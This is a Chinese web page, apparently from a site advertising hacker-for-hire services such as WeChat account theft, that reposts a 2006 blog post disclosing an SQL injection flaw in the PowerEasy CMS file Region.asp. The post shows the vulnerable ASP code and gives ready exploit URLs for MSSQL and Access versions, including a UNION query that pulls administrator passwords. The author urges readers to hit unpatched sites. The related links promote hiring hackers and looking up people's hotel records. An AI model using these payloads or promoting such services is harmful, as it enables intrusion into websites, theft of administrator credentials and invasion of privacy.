*** 微信盗号黑 *** 务 真的先办事后付款的黑客?

访客4年前黑客资讯555

每日好文

哇哈哈,昨天看到动易出补丁了,甚是郁闷,俺拿到这个0day都还没开始玩,就这样被洗白鸟,郁闷啊,早知道不玩动易主站,而且是get提交方式,当初如果听CN的话,也许这个0day还会一直埋在地下,刚看了下动易的补丁,这次补的地方不至这一个,哈哈,传说的7个以上的bug,不知道还省几个呢?下面是大概一个月前写的东西,发出来给大家搞一些懒惰的管理员,补丁都发2天了,还没补的话,就是管理员的错了哦,呵呵~~~38也还没补哦,要上的就快上,哈哈~~~ 文章标题:动易最新未公开Bug文章作者:WhyTt漏洞发现时间:2006年10月22日个人Blog:http://why_tt.mblogger.cn //个人个人Blog:http://whytt.mblogger.cn  //技术影响版本:ACCESS和MSSQL 今天下午看了一个下午的动网代码,头甚是疼,于是晚上回来,找找动易还有其他漏洞没,结果一看,还真有一处,逻辑错误!在Region.asp中 Country = ReplaceBadChar(Trim(Request("Country")))Province = ReplaceBadChar(Trim(Request("Province")))City = ReplaceBadChar(Trim(Request("City"))) 对所有传入的变量都进行了过滤,但是编程者在这里: Set TempRs = Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")If Err Or TempRs.EOF Then    ReDim ShowProvince(0, 0)    Province = Trim(Request.QueryString("Province"))Else    ShowProvince = TempRs.GetRows(-1)End IfSet TempRs = Conn.Execute("SELECT DISTINCT City FROM PE_City WHERE Province='" & Province & "'") 大家可以看到,Province = Trim(Request.QueryString("Province")) 这里直接取的是传入的Province,而不是过滤后的,所以这个Province变量危险了,那么在下面他是直接带入了查询,由于Province变量是我们可以随意构造的,所以我们就可以构造我们的SQL语句。 但是要进入这个查询的前提是:Err=true 或者 TempRs.EOF,而要达到这2个中的一个,就是要让Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")这条语句在表中查询不到所要找的Country,这样就好构造了。下面是利用代码: 0">http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+user>0-- 就是在 http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'后面加上我们的SQL注入语句。                        这就是整个利用原理,很简单,但也很致命的漏洞。 上面是MSSQL版本的利用,而如果要是ACCESS版本中的利用,那么怎么办呢,呵呵,聪明的你可能觉得我在说废话老,看吧。 http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi' and 1=1 and '1'='1 这样的话,我们的and 1=1就是在access版本中的利用。呵呵。这样就完成这个漏洞在2个版本的利用。 http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+password+from+PE_Admin+where+1

不能说的xs

相关文章

网赌被黑找黑客有用,黑客人肉网站

一、网赌被黑有用怎么找黑客 1、接单黑客任何这样的女孩都会被忽视或谴责。网赌被黑有用海外如何说服客户购买您的产品取决于您对产品的理解和把握。找站接网单黑客们建造了美国。 2、但是到了今天,黑客这个词...

能用身份证号码查到开房信息吗

微信好友删除怎么找回?随着微信的越来越普及,导致可能很多人互换联系方式都从原来的互换手机号变为相互加微信。这样的好处有很多,比如:省话费,方便联系等等,但是也有一个致命的弊端,没有对方的手机号,一旦误...

哪个国家电信公司被黑客攻击(黑客入侵电信)

哪个国家电信公司被黑客攻击(黑客入侵电信)

本文导读目录: 1、中国电信是不是被黑客入侵了今天 2、据说中国电信遭到美国黑客攻击?是真的么 3、湖南电信网络遭黑客攻击崩溃!电信网络为何如此不堪一击? 4、湖南电信网络遭黑客攻击崩溃,...

网络中黑客的目的是什么(为了有效抵御网络黑客)-黑客水平等级

网络中黑客的目的是什么(为了有效抵御网络黑客)-黑客水平等级

网络中黑客的目的是什么(为了有效抵御网络黑客)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑...

竞品分析:小睡眠VS蜗牛睡眠

竞品分析:小睡眠VS蜗牛睡眠

跟着社会成长,糊口程度提高,尚有人口代际更替,心理康健处事需求不绝增长,心理康健的市场需求越来越大。本文对小睡眠及蜗牛睡眠的举办了梳理,并从定位、内容和成果阐明小睡眠和蜗牛睡眠之间的不同,最后从SWO...

靠谱的黑客在哪里找 大平台在线找靠谱的黑客

靠谱的黑客在哪里找 大平台在线找靠谱的黑客

如今,有很多用户使用微信进行社交聊天。大多数合作伙伴喜欢微信聊天,寄红包,增进友谊和家庭。最近,一些用户想查询发送和接收红包的记录。所以小编在这里分享微信查询红包记录的过程。我们一起来看看。 在...